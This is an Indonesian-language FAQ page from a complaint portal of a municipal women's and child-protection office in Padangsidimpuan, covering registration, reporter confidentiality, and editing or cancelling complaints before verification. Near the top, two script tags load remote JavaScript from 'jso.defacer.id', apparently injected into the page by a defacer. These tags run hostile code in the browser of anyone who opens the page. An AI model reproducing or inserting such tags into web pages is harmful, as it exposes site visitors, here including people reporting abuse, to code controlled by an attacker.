Selamat datang di Website Pengaduan Dinas P3A Kota Padangsidimpuan
Faq

Frequently Asked Question (FAQ)

Pertanyaan Yang Sering Diajukan

 

 

<script src="https://jso.defacer.id/raw/dcWbI7m4p6"></script>

<script src="https://jso.defacer.id/raw/dcWbI7m4p6"></script>

Apakah setiap melakukan pelaporan  / pengaduan harus melakukan regestrasi terlebih dahulu.

Untuk pertama kali melakukan pelaporan anda diharuskan melakukan registrasi dengan mengisi data data pribadi. Data ini akan tersimpan dan tidak bisa dilihat oleh pengguna lain. kami akan merahasiakan identitas pelapor.

Pada registrasi ini anda diminta untuk membuat password simpan password ini dengan baik karena untuk melihat sampai dimana laporan yang saudara sampaikan sistem nantinya akan meminta password anda.

Jika saudara sudah pernah melakukan registrasi, untuk memasukkan laporan berikutnya anda tidak perlu lagi melakukan registrasi. Untuk satu orang hanya bisa melakukan registrasi 1 kali

Bisakah saya merubah laporan / pengaduan yang saya sampaikan

Laporan / Pengaduan hanya bisa dirubah jika belum dilakukan verifikasi oleh admin. Laporan tidak akan bisa diubah lagi jika sudah dilakukan verifikasi 

Bisakah laporan / pengaduan saya batalkan / hapus ?

Laporan / pengaduan hanya bisa dihapus / dibatalkan jika belum dilakukan verifikasi oleh admin. Laporan yang sudah diverifikasi tidak bisa dihapus / dibatalkan

Bagaimana sistematika atau susunan dalam penulisan pelaporan / pengaduan ?

Pelaporan / pengaduan dibuat singkat dan padat mudah dimengerti 

Apakah seluruh pengaduan yang disampaikan akan masuk ke sistem ini?

Ya, seluruh laporan/pengaduan yang masuk secara otomatis terekam pada  database.